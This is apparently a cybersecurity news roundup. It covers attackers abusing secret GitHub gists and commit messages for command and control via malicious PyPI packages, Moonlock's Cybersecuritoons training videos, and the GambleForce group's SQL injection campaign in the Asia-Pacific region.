Good Evening! We're diving into the deep end of the cyber world. First up, we're looking at GitHub, not just for code sharing anymore, but now a playground for savvy hackers using secret gists for nefarious purposes. Then, we'll explore how Moonlock's Cybersecuritoons is changing the cybersecurity education game, making learning about digital threats fun and engaging. Finally, we'll delve into the mysterious GambleForce, a new hacker group targeting the APAC region with SQL injection attacks. So, grab your digital armor and let's decode the latest in the cyber world!

Hackers Get Crafty with GitHub

Cybersecurity is facing a new challenge as hackers increasingly abuse GitHub, a popular open-source development platform, for nefarious purposes. In a recent twist, threat actors are using secret GitHub Gists and git commit messages to issue malicious commands and control compromised hosts. This method of attack is particularly sneaky, blending malicious network traffic with legitimate communications to avoid detection.

ReversingLabs highlighted the growing trend, noting the use of secret gists as a sort of pastebin service. What makes this approach effective is that these gists don't appear in the author's GitHub profile, making it harder to trace. PyPI packages like httprequesthub and pyhttpproxifier were found containing malicious code that points to these secret gists.

Another technique involves exploiting version control system features. Malicious actors use git commit messages to extract commands for execution, as seen in the PyPI package easyhttprequest. The growing sophistication of these methods underscores the need for increased vigilance in cybersecurity.

Trend Watch: While using GitHub for command and control (C2) infrastructure isn't new, the innovative use of features like secret Gists and commit messages for command delivery marks a significant evolution in cyber threats.

Cybersecurity Goes Edutainment

Moonlock, a cybersecurity division at MacPaw, is revolutionizing the way we approach cybersecurity awareness. Their latest creation, Cybersecuritoons, is a YouTube course designed to make cybersecurity accessible to everyone. This initiative aligns with Moonlock's mission, led by Oleg Stukalenko, to simplify cybersecurity through innovative solutions like integrating their Moonlock Engine into popular software like CleanMyMac X.

Human Errors in Cybersecurity: Stress and time pressure lead to human errors, which are the primary cause of security breaches. Tessian's "Psychology of Human Error" report found that 50% of workers made mistakes like sending wrong emails under time pressure. This highlights the critical role of awareness training in preventing financial and reputational damage from cyberattacks.

Shaping Cybersecurity Training: The training market is evolving to meet diverse needs, with expectations to reach $10 billion by 2026. MacPaw's approach involves continuous feedback and adapting training content to suit various levels of expertise. Their IT Security Engineer, Artem Bovtiukh, emphasizes the importance of a feedback culture for the effectiveness of training programs.

Empowering Employees: At MacPaw, security awareness is a collective responsibility. They encourage teams to take dedicated days off for cybersecurity education, addressing the common issue of lack of time for training. This approach not only educates but also aligns with the company's objectives and contributes to professional development.

Looking Ahead: With the rise of short, accessible content like Cybersecuritoons, the future of cybersecurity training is more engaging and effective, catering to different levels of security expertise.

GambleForce: A New Threat in the APAC Region

The cyber world has witnessed the emergence of a new threat, GambleForce, targeting companies in the Asia-Pacific (APAC) region with SQL injection attacks. Group-IB, a cybersecurity firm based in Singapore, has revealed that this previously unknown hacker group has been active since at least September 2023.

Attacking the APAC: GambleForce has been employing basic but effective techniques, including SQL injections and exploiting vulnerabilities in website CMS, to steal sensitive information like user credentials. They have targeted organizations in various sectors across countries like Australia, China, India, and South Korea, with six successful attacks out of 24 attempts.

Tools of the Trade: The group primarily uses open-source tools like sqlmap and Cobalt Strike, a legitimate post-exploitation framework, for their attacks. Intriguingly, the version of Cobalt Strike used features commands in Chinese, adding a layer of mystery to the group's origins.

Exploiting Weaknesses: GambleForce's modus operandi involves exploiting public-facing applications through SQL injections and taking advantage of vulnerabilities like CVE-2023-23752 in Joomla CMS. These tactics allow them to bypass authentication protections and access sensitive data.

A Wake-Up Call for Web Security: The activities of GambleForce underscore the importance of secure coding practices and the need for regular software updates to protect against SQL injection attacks. As Nikita Rostovcev, a senior threat analyst at Group-IB, points out, developers often overlook input security and data validation, making web applications vulnerable to such attacks.